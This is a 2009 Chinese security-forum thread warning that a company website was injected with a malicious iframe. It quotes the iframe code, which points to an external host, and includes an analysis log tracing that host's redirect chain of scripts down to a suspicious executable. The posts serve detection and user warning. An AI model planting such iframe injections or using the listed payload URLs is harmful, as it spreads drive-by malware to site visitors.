查看: 2312|回复: 3
收起左侧

[已鉴定] hxxp://www.hhghost.com/【被挂马】( 主页面没被挂 by IllusionWing)

[复制链接]
天使的愤怒
发表于 2009-8-26 11:53:34 | 显示全部楼层 |阅读模式
各位朋友:
你们好!

如果你们近期要上浩海技术的官网的话,请小心!浩海技术的官网已被植入挂马代码!请开启大蜘蛛实时监控并升级到最新版本的病毒库,以防自己的虚拟财产受到损失!
浩海技术官网:hxxp://www.hhghost.com/【被挂马】
挂马代码:
<iframe src="http://fghjk1.9966.org/oday/09165/index.htm" width=100 height=0></iframe>


[ 本帖最后由 bc123 于 2009-8-26 11:54 编辑 ]
IllusionWing
发表于 2009-8-26 12:33:31 | 显示全部楼层
没发现挂马。8过那iframe有马儿是事实。。

原始 - http://fghjk1.9966.org/oday/09165/index.htm
开始自动解析 - http://fghjk1.9966.org/oday/09165/index.htm
L1 - http://fghjk1.9966.org/oday/09165/Td14.htm
L1 - http://fghjk1.9966.org/oday/09165/yt.htm
L1 - http://fghjk1.9966.org/oday/09165/dxxz.htm
L1 - http://fghjk1.9966.org/oday/09165/yut.htm
L2 - http://fghjk1.9966.org/oday/09165/14.js
L2 - http://fghjk1.9966.org/oday/09165/15.js
L2 - http://fghjk1.9966.org/oday/09165/16.js
L2 - http://fghjk1.9966.org/oday/09165/a.jpg
L2 - http://fghjk1.9966.org/oday/09165/b.jpg
L2 - http://fghjk1.9966.org/oday/09165/url.jpg
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L2 - http://fghjk1.9966.org/oday/09165/c.jpg
L2 - http://fghjk1.9966.org/oday/09165/d.jpg
L2 - http://fghjk1.9966.org/oday/09165/e.jpg
L2 - http://fghjk1.9966.org/oday/09165/f.jpg
L2 - http://fghjk1.9966.org/oday/09165/091.js
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L2 - http://fghjk1.9966.org/oday/09165/092.js
L2 - http://fghjk1.9966.org/oday/09165/ytfl.htm
L2 - http://fghjk1.9966.org/oday/09165/ytfl1.htm
L2 - http://fghjk1.9966.org/oday/09165/of.htm
关注 - http://fghjk1.9966.org/oday/09165/09165.exe
L3 - http://fghjk1.9966.org/oday/09165/s1;o2.click}
L3 - http://fghjk1.9966.org/oday/09165/y1.htm
L3 - http://fghjk1.9966.org/oday/09165/t2.htm
L3 - http://fghjk1.9966.org/oday/09165/of.js
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L3 - http://fghjk1.9966.org/oday/09165/of1.css

输出的对象 - http://fghjk1.9966.org/oday/09165/09165.exe

此分析日志由 Illusion Wing 使用 Astox v1 Build 1100 在 2009年8月26日12时32分15秒 生成。
weijinkun4
发表于 2009-8-29 17:20:44 | 显示全部楼层
avast有马报告
Hopesky
发表于 2009-8-29 17:35:26 | 显示全部楼层
RPWT大爆发...

读取代码失败~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-18 07:25 , Processed in 0.120071 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表